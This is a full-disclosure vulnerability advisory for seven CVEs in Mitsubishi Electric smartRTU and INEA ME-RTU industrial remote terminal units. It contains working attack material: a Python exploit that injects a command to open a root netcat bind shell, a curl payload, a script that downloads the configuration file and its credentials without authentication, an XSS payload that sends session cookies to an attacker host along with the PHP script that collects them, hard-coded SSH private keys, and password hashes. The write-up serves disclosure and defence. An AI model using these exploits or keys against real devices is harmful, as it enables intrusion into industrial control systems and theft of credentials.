(CVE-2019-14925 –> CVE-2019-14931) Mitsubishi Electric & INEA RTU Multiple Vulnerabilities
#-------------------------------------------------------
# Multiple Vulnerabilities
# Mitsubishi Electric smartRTU & INEA ME-RTU
# Working exploits: Yes
# Public Disclosure Date: 13 August 2019
# CVE-IDs: CVE-2019-14925 -> CVE-2019-14931 (7 CVE-IDs)
# Author: Mark Cross (@xerubus | mogozobo.com)
#-------------------------------------------------------
====================
Summary
====================
Product: Mitsubishi Electric smartRTU & INEA ME-RTU
Version: Latest version of firmware (Misubishi Electric 2.02 & INEA 3.0) and prior
Vendor: Mitsubishi Electric / INEA
CVE-IDs: CVE-2019-14925 -> CVE-2019-14931 (7 CVE-IDs)
Mitsubishi Electric’s smartRTU “addresses requirements for 100% reliable remote surveillance and control of distributed assets, even in extreme climates. With powerful functions like diagnostics, alarm and event-storage and time trend data buffering, it meets the challenges of managing massively distributed assets such as data security, interfacing issues, data continuity and reliable communications. Mitsubishi Electric‘s smartRTU combines the needs of a large number of industries into a single device that is simpler than conventional RTUs, yet provides powerful capabilities that can be easily deployed and administered, even by staff with low skill levels. The smartRTU is scalable from a handful of sites to many hundreds with remote configuration management.”
Further information can be found at the following URLs:
The following vulnerabilities have been discovered in Mitsubishi Electric’s smartRTU running firmware version 2.02 and INEA’s ME-RTU running firmware version 3.0:
- Unauthenticated OS Command Injection (CVE-2019-14931)
- Unauthenticated Download of Configuration File (CVE-2019-14927)
- Stored Cross-site Script (XSS) (CVE-2019-14928)
- Use of Hard-coded Cryptographic Keys (CVE-2019-14926)
- Hard-coded User Passwords (CVE-2019-14930)
- Plaintext Password Storage (CVE-2019-14929)
- World-readable Configuration File (CVE-2019-14925)
It is important to note that Mitsubishi Electric and INEA were unable to provide mitigations for the identified vulnerabilities during the 45 day disclosure period. If you currently utilise Mitsubishi Electric smartRTU’s or INEA ME-RTU’s in your environment, consider the following workarounds:
- Ensure the RTUs have appropriate controls to protect the devices from unauthorized network access;
- Ensure the RTUs are not exposed or accessible from the Internet;
- Ensure the RTUs are not exposed or accessible from corporate or other untrusted networks;
- Initiate change control and test processes once patches are released by the vendor. If unable to patch, ensure appropriate controls and logging capability are in place for vulnerable devices.
====================
Disclosure Timeline
====================
27 June 2019
– Vulnerabilities discovered. Further testing commenced.
29 June 2019
– I disclosed vulnerabilities to ICS-CERT <ics-cert@hq.dhs.gov> via PGP encrypted email. Receipt of email requested.
– 45 day disclosure time advised and commenced (13 August 2019).
30 June 2019
– I disclosed to ICS-CERT <ics-cert@hq.dhs.gov> via PGP encrypted email that INEA’s firmware version 3.0 is also affected by the same vulnerabilities.
03 July 2019
– I re-sent disclosure to ICS-CERT <ics-cert@hq.dhs.gov> requesting a response that they have received the details. Advised that I will be going to full disclosure should no response occur.
04 July 2019
– GRP-CSOC <csoc@inl.gov> emailed advising ticket ICS-VU-016907 has been assigned to this case.
16 July 2019
– GRP-CSOC <csoc@inl.gov> emailed advising that contact was established with the vendor and the report was sent to them.
23 July 2019
– I requested an update due to disclosure date getting close.
– GRP-CSOC <csoc@inl.gov> advised they have requested an update from the vendor
07 August 2019
– GRP-CSOC <csoc@inl.gov> advised that Mitsubishi have requested an extension to the disclosure date
– I advised that it has been 37 days since the original disclosure, and full disclosure is set for 6 days time, it is unreasonable to be requesting an extension to the disclosure period so late in the process. I will be disclosing these vulnerabilities on 13/08/19 (AEST) as originally advised.
– GRP-CSOC <csoc@inl.gov> advised they will issue an alert on the disclosure date.
– I provided GRP-CSOC with risk mitigation steps for their alert.
10 August 2019
– GRP-CSOC <csoc@inl.gov> advised that I will need to seek CVE-IDs from Mitre
– GRP-CSOC <csoc@inl.gov> provided a draft alert for comment.
– I requested CVE-IDs from Mitre
11 August 2019
– Mitre assigned CVE-2019-14925 -> CVE-2019-14931 (7 CVE-IDs)
– I submitted exploits to exploit-db
13 August 2019
– Public disclosure
#-----------------------------------------------------------------------------------
# 1. Unauthenticated OS Command Injection
# CVE-ID: CVE-2019-14931
# CWE-ID: CWE-78: Improper Neutralisation of Special Elements used in an OS Command
# Exploit-DB ID: https://www.exploit-db.com/exploits/47235
#-----------------------------------------------------------------------------------
====================
Tested versions / Platform
====================
Mitsubishi Electric’s ME-RTU firmware version 2.02 and INEA’s ME-RTU running firmware version 3.0
====================
Details
====================
An unauthenticated remote OS Command Injection vulnerability in Mitsubishi Electric’s smartRTU and INEA’s ME-RTU allows an attacker to execute arbitrary commands on the RTU due to the passing of unsafe user supplied data to the RTU’s system shell. Functionality in the mobile.php
page provides users with the ability to ping sites or IP addresses via the ‘Mobile Connection Test
‘. An attacker can use a shell command separator (;
) in the ‘host
‘ variable to execute operating system commands upon submitting the test data.
When the Mobile Connection Test is submitted, action.php
is called to execute the test. The following is the contents of the action.php
script:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
<script> var RESULTS = top.document.getElementById( "results" ); RESULTS.innerHTML = '<?php $www = "www.inea.si"; if (isset($_POST["host"])) $www = $_POST["host"]; $command="sudo /bin/ping -I ppp0 -c1 -w1 ".$www; exec($command, $response); $pos = false; if (isset($response[4])) $pos = strpos($response[4], "1 received"); if ($pos === false) { echo "Connection failed"; } else { echo "Connection OK!"; } ?>'; </script> |
Due to improper input sanitising, it is possible for an attacker to inject an operating system command into the $command
variable by appending the host variable with a shell command separator. As an example, the host
variable could contain the following string: "www.inea.si;ping 127.0.0.1"
, which would execute the legitimate ping
check against the host www.inea.si
as well as execute a second unauthorised ping
to localhost
.
The www-data
user is configured with a limited amount of commands which may be executed with root
privileges via sudoers
. The sudo
permissions are stored in the /etc/sudoers.d/viswww
file. The following shows the commands able to be executed with sudo
capability:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
www-data ALL=NOPASSWD: /usr/bin/BFMDebug www-data ALL=NOPASSWD: /bin/ping www-data ALL=NOPASSWD: /usr/bin/SettingsChange www-data ALL=NOPASSWD: /usr/bin/GprsStatus www-data ALL=NOPASSWD: /usr/bin/openssl www-data ALL=NOPASSWD: /sbin/ifconfig www-data ALL=NOPASSWD: /sbin/iptables www-data ALL=NOPASSWD: /usr/bin/IECMasterSettings www-data ALL=NOPASSWD: /etc/init.d/rtudb www-data ALL=NOPASSWD: /usr/smartrtu/prepareSD.sh www-data ALL=NOPASSWD: /usr/smartrtu/change-passwd.sh www-data ALL=NOPASSWD: /bin/chgrp www-data ALL=NOPASSWD: /bin/chmod www-data ALL=NOPASSWD: /usr/sbin/service www-data ALL=NOPASSWD: /sbin/ifdown www-data ALL=NOPASSWD: /sbin/ifup |
Whilst the allowable commands which can be executed with root
privileges is quite limited, it is possible to exploit local security restrictions in the /usr/sbin/service
to run any OS command with sudo
granted root
privileges. By utilising the privileged context of the ‘service
‘ binary, it is possible to create a root
bind shell via netcat
on the RTU by injecting the following string into the $host
variable:
1 |
;sudo /usr/sbin/service ../../bin/nc -nvlp 1337 -e /bin/sh |
The following snippet shows the bind
shell being executed as root
on the RTU:
1 2 3 4 5 |
root@smartrtu:~# ps aux | grep "[1]337" www-data 4939 0.0 0.0 1480 416 ? S 07:31 0:00 sh -c sudo /bin/ping -I ppp0 -c1 -w1 ;sudo /usr/sbin/service ../../bin/nc -nvlp 1337 -e /bin/sh root 4954 0.6 0.2 4604 2396 ? S 07:31 0:00 sudo /usr/sbin/service ../../bin/nc -nvlp 1337 -e /bin/sh root 4961 0.3 0.1 1536 1140 ? S 07:31 0:00 /etc/init.d/../../bin/nc -nvlp 1337 -e /bin/sh root@smartrtu:~# |
The following snippet shows the successful bind
shell from the remote attacking host:
1 2 3 4 5 |
attacker > nc 192.168.7.70 1337 id;whoami;hostname uid=0(root) gid=0(root) groups=0(root) root smartrtu |
Due to the lack of session checking, it is possible for an attacker to perform the same attack as above from an unauthenticated posture by simply supplying the malicious payload directly to the ‘action.php
‘ page. The following is a simple curl
command which can be run from the attacking host:
1 |
curl -i -s -k -X $'POST' -H $'Host: 192.168.7.70' --data-binary $'host=%3Bsudo+%2Fusr%2Fsbin%2Fservice+..%2F..%2Fbin%2Fnc+-nvlp+1337+-e+%2Fbin%2Fsh&PingCheck=Test' $'http://192.168.7.70/action.php' |
====================
Exploit difficulty
====================
It is possible for an attacker to perform the command injection from both an authenticated and unauthenticated perspective. An attacker who successfully exploits the vulnerability can execute arbitrary code on the target system with the same privilege rights and context of the user running the process.
====================
Proof of Concept
====================
The following snippet shows the proof of concept code being executed to obtain a bind shell with root privileges on the vulnerable smartRTU:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
_ _ ___ (~ )( ~) / \_\ \/ / | D_ ]\ \/ -= Bind_Me-smartRTU by @xerubus =- | D _]/\ \ -= We all have something to hide =- \___/ / /\ \ (_ )( _) @Xerubus Enter RTU IP address: 192.168.7.70 Enter bind shell port number: 1337 [+] Building payload [+] Sending payload [+] Attempting connection to smartRTU [+] Connected to the smartRTU! (smartRTU-shell) # id uid=0(root) gid=0(root) groups=0(root) (smartRTU-shell) # hostname smartrtu (smartRTU-shell) # exit [!] Play nice now skiddies.... |
The following proof of concept (POC) code will be submitted to exploit-db at the end of the 45 day disclosure period.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 |
#!/usr/bin/python # Exploit Title: Mitsubishi Electric smartRTU & INEA ME-RTU Unauthenticated OS Command Injection # Date: 29 June 2019 # Exploit Author: (@xerubus | mogozobo.com) # Vendor Homepage: https://eu3a.mitsubishielectric.com/fa/en/products/cnt/plcccl/items/smartRTU/local # Vendor Homepage: http://www.inea.si/en/telemetrija-in-m2m-produkti/mertu-en/ # Firmware Version: Misubishi Electric 2.02 & INEA 3.0 # CVE-ID: CVE-2019-14931 # Full write-up: https://www.mogozobo.com/?p=3593 import sys, os, requests, socket os.system('clear') print("""\ _ _ ___ (~ )( ~) / \_\ \/ / | D_ ]\ \/ -= Bind_Me-smartRTU by @xerubus =- | D _]/\ \ -= We all have something to hide =- \___/ / /\ \\ (_ )( _) @Xerubus """) host = raw_input("Enter RTU IP address: ") port = raw_input("Enter bind shell port number: ") php_page = '/action.php' url = "http://{}{}".format(host, php_page) payload = {'host' : ';sudo /usr/sbin/service ../../bin/nc -nvlp '+port+' -e /bin/sh&PingCheck=Test'} print "\n[+] Building payload" print "[+] Sending payload" print "[+] Attempting connection to smartRTU" try: r = requests.post(url, data=payload, timeout=1) except: pass port = (int(port)) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) try : print "[+] Connected to the smartRTU!\n" while 1: cmd = raw_input("(smartRTU-shell) # "); s.send(cmd + "\n"); result = s.recv(1024).strip(); if not len(result) : print "\n[!] Play nice now skiddies....\n\n" s.close(); break; print(result); except KeyboardInterrupt: print "\n[+] ^C Received, closing connection" s.close(); except EOFError: print "\n[+] ^D Received, closing connection" s.close(); except socket.error: print "[!] Failed to connect to bind shell." |
#------------------------------------------------------
# 2. Unauthenticated Download of Configuration File
# CVE-ID: CVE-2019-14927
# CWE-ID: CWE-284: Improper Access Control
# Exploit-DB ID: https://www.exploit-db.com/exploits/47234
#------------------------------------------------------
====================
Tested versions / Platform
====================
Mitsubishi Electric ME-RTU firmware version 2.02 and INEA’s ME-RTU running firmware version 3.0
====================
Details
====================
It is possible to download the Mitsubishi Electric smartRTU’s and the INEA ME-RTU’s configuration file from an unauthenticated posture due to a vulnerability in the web-based management interface of the RTU. Improper access controls for URLs allow the bypass of authentication controls, resulting in the unauthenticated download of the configuration file which contains data such as usernames, passwords, and other sensitive RTU data.
The following is a simple curl
command which can be executed from the attacking host to obtain the smartRTU configuration file:
1 |
> curl -i -s -k http://192.168.7.70/saveSettings.php |
The following snippet shows the response of the above curl command while searching for Username or Password strings:
1 2 3 4 5 6 7 8 9 10 |
> curl -i -s -k http://192.168.7.70/saveSettings.php | grep -i 'username\|password' <MobilePAPUsername>field_rtu_a34</MobilePAPUsername> <MobilePAPPassword>*T44Zkl.90</MobilePAPPassword> <MobileCHAPUsername>default</MobileCHAPUsername> <MobileCHAPPassword>default</MobileCHAPPassword> <DDNSUserName>User-redacted</DDNSUserName> <DDNSPassword>*Fn]mwA\vVrL#</DDNSPassword> <OpenVPNUsername>field_rtu_a34</OpenVPNUsername> <OpenVPNPassword>*T44Zkl.90</OpenVPNPassword> |
====================
Exploit difficulty
====================
An attacker can download the RTU configuration file an unauthenticated perspective by requesting URL from the affected device via HTTP
requests.
====================
Proof of Concept
====================
The following snippet shows the proof of concept code being executed to obtain a bind shell with root
privileges on the vulnerable smartRTU:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
_ _ ___ (~ )( ~) / \_\ \/ / | D_ ]\ \/ -= Conf_Me-smartRTU by @xerubus =- | D _]/\ \ -= We all have something to hide =- \___/ / /\ \ (_ )( _) @Xerubus Enter RTU IP address: 192.168.7.70 [+] Attempting to download smartRTU configuration file [+] Successfully obtained smartRTU configuration file.. saving to smartRTU_conf.xml > grep -i 'username\|password' smartRTU_conf.xml <MobilePAPUsername>field_rtu_a34</MobilePAPUsername> <MobilePAPPassword>*\yl~~v^uHZh|eA##</MobilePAPPassword> <MobileCHAPUsername>default</MobileCHAPUsername> <MobileCHAPPassword>default</MobileCHAPPassword> <DDNSUserName>user-redacted</DDNSUserName> <DDNSPassword>*\qKhUi[pcR]m#j[xUA##</DDNSPassword> <OpenVPNUsername>field_rtu_a34</OpenVPNUsername> <OpenVPNPassword>*\yl~~v^uHZh|eA##</OpenVPNPassword> |
The following proof of concept (POC) code will be submitted to exploit-db
at the end of the 45 day disclosure period.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 |
#!/usr/bin/python # Exploit Title: Mitsubishi Electric smartRTU & INEA ME-RTU Unauthenticated Configuration Download # Date: 29 June 2019 # Exploit Author: (@xerubus | mogozobo.com) # Vendor Homepage: https://eu3a.mitsubishielectric.com/fa/en/products/cnt/plcccl/items/smartRTU/local # Vendor Homepage: http://www.inea.si/en/telemetrija-in-m2m-produkti/mertu-en/ # Firmware Version: Misubishi Electric 2.02 & INEA 3.0 # CVE-ID: CVE-2019-14927 # Full write-up: https://www.mogozobo.com/?p=3593 import sys, os, requests, socket os.system('clear') print("""\ _ _ ___ (~ )( ~) / \_\ \/ / | D_ ]\ \/ -= Conf_Me-smartRTU by @xerubus =- | D _]/\ \ -= We all have something to hide =- \___/ / /\ \\ (_ )( _) @Xerubus """) host = raw_input("Enter RTU IP address: ") php_page = '/saveSettings.php' url = "http://{}{}".format(host, php_page) print "[+] Attempting to download smartRTU configuration file" r = requests.get(url) if r.status_code == 200: print "[+] Successfully obtained smartRTU configuration file.. saving to smartRTU_conf.xml\n" with open('smartRTU_conf.xml', 'w') as f: f.write(r.content) |
#-------------------------------------------------------------------
# 3. Stored Cross-site Script (XSS)
# CVE-ID: CVE-2019-14928
# CWE-ID: CWE-79: Improper Neutralisation of user supplied input
#-------------------------------------------------------------------
====================
Tested versions / Platform
====================
Mitsubishi Electric ME-RTU firmware version 2.02 and INEA’s ME-RTU running firmware version 3.0
====================
Details
====================
A number of stored XSS vulnerabilities have been identified in Mitsubishi Electric’s smartRTU and INEA’s ME-RTU web configuration software which could allow an authenticated threat actor to inject malicious code directly into the application.
An example input variable vulnerable to stored XSS
exists in the ‘index.php
‘ page:
1 |
<td class="m"><input type="text" name="SerialInitialModemString" size="34" value="XSS code goes here"></td> |
An attacker can replace the string ‘XSS code goes here
‘ with “/><script>alert(“xss”)</script> in order to exploit the stored XSS
vulnerability, resulting in an alert box with the message ‘xss
‘ being displayed whenever a user visits the ‘index.php
‘ page.
====================
Exploit difficulty
====================
It is possible for an attacker to injection malicious code from an authenticated perspective only. An attacker who successfully exploits the XSS
vulnerabilities can run arbitrary code on the client target system.
====================
Proof of Concept
====================
The following snippet shows the proof of concept code being executed to obtain a logged on user’s session ID and send the session ID to the attackers host in order to perform a session replay based attack to bypass username/password authentication methods on the vulnerable smartRTU:
1 |
"/><script>location.href="http://attackers-ipaddr/cookiemonster.php?cookiemonster="+document.cookie;</script> |
In order to receive the session cookie details from the targeted user, the following php
script needs to be available on the attackers host:
1 2 3 4 |
#cookiemonster.php <?php $cookie = isset($_GET["cookiemonster"])?$_GET['cookiemonster']:""; ?> |
The following snippet shows the attacking host successfully receiving the session cookie from the logged in user on the smartRTU web interface. By replaying the session token, it is possible for the attacker to bypass username/password requirements and access the web interface as the victim user.
1 |
192.168.7.67 - - [29/Jun/2019 12:45:12] "GET /cookiemonster.php?cookiemonster=PHPSESSID=qgod127cgop3plndmbnq86qjv0 HTTP/1.1" 200 - |
#----------------------------------------------------
# 4. Use of Hard-coded Cryptographic Keys
# CVE-ID: CVE-2019-14926
# CWE-ID: CWE-798: Use of Hard-coded Credentials
#----------------------------------------------------
====================
Tested versions / Platform
====================
Mitsubishi Electric ME-RTU firmware version 2.02 and INEA’s ME-RTU running firmware version 3.0
====================
Details
====================
Hard-coded SSH
keys have been identified in Mitsubishi Electric’s smartRTU and INEA’s ME-RTU firmware. As the secure keys cannot be regenerated by a user, and are not regenerated on firmware updates, all deployed Mitsubishi Electric smartRTU’s and INEA’s ME-RTU’s utilise the same SSH keys.
====================
Exploit difficulty
====================
An attacker may leverage this vulnerability by copying the SSH keys directly from the smartRTU device or from the firmware available for download on Mitsubishi Electric’s and INEA’s web site.
====================
SSH Key Details
====================
The following is the contents of the hard-coded RSA private key located in /etc/ssh/ssh_host_rsa_key
on the RTU:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
-----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEAxPi/K0gztqpz70Bs089fDrtQliQf0vvuEwn+CrwGv60qcq14 pFX6H5vrNjsd3YNMg1l4mo6ORZtD6twHmJT7RX2sh6Fh+brCBs5K8urJNvhuc4cw XeVa5PwX2jXTnQgCmblAU0FkHab5/hBAuVWPg2taz9dY1AGdow7ZW97O2wsR1IEy ArUqBQBcZSwlv16jF1UcG85Dwp5zJghivYhSiO9s8rvLuYFOvReckH0+jWrIoVbC LgUOD517iROLivPGIGpMezgiiGnIdiN8Gjjuwq88Ctstvd10bnUbs9bjQwltG7TK OKxIMxZspFkOfequSf4vPIe+Xd/JmZPQ92jYLwIDAQABAoIBAFtN3vfGOUqESsdt usSYTLz8cUeXqTTY2Sv0JtF9BTfWomWUKecrf40lbmuuDZL/6Pi+AZzLVgHIDjyR D+hXrv4wWkhos4zaWFRlTfK6iNk1YaWl1fLAfVjFzpy09MnGy8XMTJgLKMhh/WIa 0JXYpnTJz8emUCO+N/88w97FMmfwMa9iGaZ+exDOspNe/dVBGJbU4SGDvjJu3igX Hrl1PdPDm6/Rvdhhj4HoSTIGF14Bhwpk8EMmYcI71MZhLV8b5SDjjldfKJtMt/A2 fm3cY8BQXISEJpjbEf/GDiVDG6iKjOTu6oHcGue4enh+zcAM6cIRuVOzqd/tMN4E GkLg0kECgYEA9TUHcz40Xad9lQKWuPrvjUA4lVDOiJVOnJJ6XnRETbgHyeIe4hTh gao8ydzPsgZlaBog2EPT2ADj5UBovTwfeH7O/7FSnrQaPI9m/SVncC2vcW1wxVMy gWCWevlfcp8hfkynJYoBPUY3xIouo3PFfT1qju0BUygwgB1IzyzePaECgYEAzaQ0 cToXMkkv7leKKjONIOFN0vXM06wk6kdddEhsXUGLDjeo0ppbW+Nr8P5uKKBCqCpp /qTo0zjSFXoxPe2J7yAuUlnbZyPxI2Ik7L0Xy3Iv03j7C7iTt79FkBL/RgDTzkkR TiYL5zSJfjiK0cor2baRY8bd1ZXpH1dKdPhII88CgYEAqBwSHoVgG3FQHM/oi6um fn2wDVaYMnXCrn+SG520kmAAHv3C1JciP+Z5xJ95WYEfFu8K45ok6+s4Ux0EcfB9 VvwBaLWmgh3R+wEJx7ZUI0l/BdHVRcOTVbXllSvQr2G/8boVwhvKW7r/UuS1suQV Wpa3roN4rA1aqwrotvj46OECgYAYlaf7XWGGjn9fdDG9Z9pYcvcV4HLzX2IubAe9 LideYsaYFYlmXDPN4Xt3HUPYMYimiCOR4O9AyUs8bBZU/AAAiY1gJQP46bAbddFK SDT/CpCzLIR+2zs1vXU4izzfhpvLzqp1+FB1/K7vWx0lhZEGfzAUiKLetQRgzdPF 9iTRuwKBgQCFLVkbrko5iBJ0EQlDSl42Jst6D5rRV8SnBHgL9DKCQ/foy01lDep0 fdCHnJ8t1NYJsn2CNS8GU0UzxGqP1dLHfc4tyOyB5Ta9j/rKCctw0V/q5zvy7QB9 iLEP8NKMVYsHb9JtSs5IZrWn2NDc7VZh4lmuRyCex9VBnM822k2WZw== -----END RSA PRIVATE KEY----- |
The following is the contents of the hard-coded EC private key located in /etc/ssh/ssh_host_ecdsa_key
on the RTU:
1 2 3 4 5 |
-----BEGIN EC PRIVATE KEY----- MHcCAQEEIBfyMMBj0Q4ITiBu8dAX3ZJjrrb+pyNlHGOSgc3zzDKZoAoGCCqGSM49 AwEHoUQDQgAE43ZHcByrfCQvtjgtkrEmlWwz9/5k2rrNd8eGICUtm4Aemym75URZ JD25Wp5qpS6PnosaiGxwT21i2HHxEa9fXg== -----END EC PRIVATE KEY----- |
The following is the contents of the hard-coded DSA private key located in /etc/ssh/ssh_host_dsa_key
on the RTU:
1 2 3 4 5 6 7 8 9 10 11 12 |
-----BEGIN DSA PRIVATE KEY----- MIIBuwIBAAKBgQC59ErFZfMgLaxQ/P3sRLDahMN1CUv8l2nWhYc068iRbuGkagU4 IQAyId1em8yZkNxFC9xcvmpE/R9uX8N+oXR0HoVQEfBrPxg7lrZm7CrZespIJN7w 3uPp7Yg+AMUmu6rMPzbOontv+R4vzDj/0Dp+PUkVCopqel85tx9tlWtt6QIVAOE9 rKbZ3LqnD/kyH1Naoc/5weyrAoGANcL9LBeO1OLRDFypsZk1tkdIU9fFDkwYKFRZ CDTLYrq3xw2U5Sw4kJnWMqvPNy6494vRbKz+ePJJm17C+fk3KhLcAA7GYzIHbvZI vFfl36lUvGyIaJXh+3rKUoZQ047gEyH0kcNkveZ+5E9AfXd0R2tG5MQPU1gXuq6E HbyJiksCgYAEwvuOKlbt5A4ewFj0Ej+R72SKtPC4E2p5VJGn6ErTWTggNVDRO6Db BS0TpoEwUhwNGRA170Wf2dKceT4WRmuR7A4nUTkRaaX7DODcttsgbdzLrq3NRkRT kyU5Zwd5QU4Ml3kjvqbK+sSpwHlbUMNDMrZ2V5g1ZEhPIowvjGw5VQIVAJDtaIZE w9FXxDo/o790HKUiTNKv -----END DSA PRIVATE KEY----- |
#---------------------------------------------------
# 5. Hard-coded User Passwords
# CVE-ID: CVE-2019-14930
# CWE-ID: CWE-798: Use of Hard-coded Credentials
#---------------------------------------------------
====================
Tested versions / Platform
====================
Mitsubishi Electric ME-RTU firmware version 2.02 and INEA’s ME-RTU running firmware version 3.0
====================
Details
====================
Mitsubishi Electric’s smartRTU and INEA’s ME-RTU devices contain undocumented user accounts with hard-coded password credentials. An attack could exploit this vulnerability by using the accounts to log into affected RTU’s. The following user accounts contain hard-coded passwords:
1 2 3 4 5 |
- root:$6$poN.2/6a$gwFR8n75FxYbJKxV2U2TAJ0/UVMPhd.rQ1BENWpgm4auibJxNF1ASMV2g.sYKku06qpW1IFtfOa5Bb4T58kzS1 - ineaadmin:$6$OBY8cgUh$OwO7QcUKxV/5cOCfRVV50oEIW/ujyITOfQPShXuUF4vphMDokqzJ/MjVkciVDKlAf8PlYbrIiHWBRwfrXhMS81 - mitsadmin:$6$kstNfUE1$cUSELLqCJdsTfAxPJhiASOrbcVcWylO6lhjf/085bv/iukOua5EBOSoAqnLvIWJd/pykTDSEe2hBP3evC7YmP. - maint:$6$ck.dtfVT$pmIAsZjwuR5BActCGm6XBZmWSClFarAW2zPS/0RvpcLIY/DeajYwbyaNLQ2Vx/kHJa.hqRJFykEwXyrdg33Ta/ - rtuadmin:$6$j6M5JdzS$49TLlSXuW6krsunIoV3y4zeFlsMwzdiHvnQwFGEFHxyeNjDzmtcZbZrJlGkaWmqm41iq.I77Z54IqQlHkQHrc. |
====================
Exploit difficulty
====================
An attacker can with access to the smartRTU’s operating system, or access to the firmware downloadable from Mitsubishi Electric’s and INEA’s website, can obtain the password hashes from /etc/shadow
and crack the passwords with tools such as hashcat
or john the ripper
.
As the ineaadmin
and mitsadmin
user accounts are members of the ‘admin
‘ group on the RTU, they are able to elevate their accounts to gain root
privileges as the admin
group is granted full root
access without the need to supply a password via sudo
. The following snippet from /etc/group
shows the accounts in the admin group on the RTU:
1 |
admin:x:1001:ineaadmin,mitsadmin |
The following snippet from /etc/sudoers
shows the admin
group is given full root
privileges without password authentication:
1 2 |
# Members of the admin group may gain root privileges %admin ALL = (ALL) NOPASSWD: ALL |
#------------------------------------------------------
# 6. Plaintext Password Storage
# CVE-ID: CVE-2019-14929
# CWE-ID: CWE-255: Credentials Management
#------------------------------------------------------
====================
Tested versions / Platform
====================
Mitsubishi Electric ME-RTU firmware version 2.02 and INEA’s ME-RTU running firmware version 3.0
====================
Details
====================
Mitsubishi Electric’s smartRTU and INEA’s ME-RTU store password credentials in plain text in a configuration file. An unauthenticated user can obtain the exposed password credentials to gain access to the following services:
– DDNS service
– Mobile Network Provider
– OpenVPN service
====================
Exploit difficulty
====================
It is possible to download the smartRTU’s configuration file from an unauthenticated posture due to a vulnerability in the web-based management interface of the RTU. Improper access controls for URLs allow the bypass of authentication controls, resulting in the unauthenticated download of the configuration file which contains data such as usernames, passwords, and other sensitive RTU data.
====================
Proof of Concept
====================
The following snippet from the XML configuration file shows the plaintext password strings:
1 2 3 4 5 6 7 8 9 10 |
> curl -i -s -k http://192.168.7.70/saveSettings.php | grep -i 'username\|password' <MobilePAPUsername>field_rtu_a34</MobilePAPUsername> <MobilePAPPassword>*T44Zkl.90</MobilePAPPassword> <MobileCHAPUsername>default</MobileCHAPUsername> <MobileCHAPPassword>default</MobileCHAPPassword> <DDNSUserName>User-redacted</DDNSUserName> <DDNSPassword>*Fn]mwA\vVrL#</DDNSPassword> <OpenVPNUsername>field_rtu_a34</OpenVPNUsername> <OpenVPNPassword>*T44Zkl.90</OpenVPNPassword> |
#-------------------------------------------------------
# 7. World-readable Configuration File
# CVE-ID: CVE-2019-14925
# CWE-ID: CWE-276: Incorrect Default Permissions
#-------------------------------------------------------
====================
Tested versions / Platform
====================
Mitsubishi Electric ME-RTU firmware version 2.02 and INEA’s ME-RTU running firmware version 3.0
====================
Details
====================
Mitsubishi Electric’s smartRTU and INEA’s ME-RTU stores and reads configuration settings from a file located in /usr/smartrtu/ini/settings.xml
. This file has insecure world-readable permissions assigned, allowing all users on the system to read the configuration file which contains username and plain text password combinations, as well as other sensitive configuration information of the RTU.
The following shows the permissions assigned to the settings.xml
file on the smartRTU:
1 2 |
smartrtu > ls -al usr/smartrtu/init/settings.xml -rw-rw-r-- 1 root root 11537 Jul 23 2015 usr/smartrtu/init/settings.xml |
====================
Exploit difficulty
====================
It is possible for any user logged on to the Mitsubishi Electric smartRTU or INEA ME-RTU to read the contents of the settings.xml
file due to the world-readable permission assignment.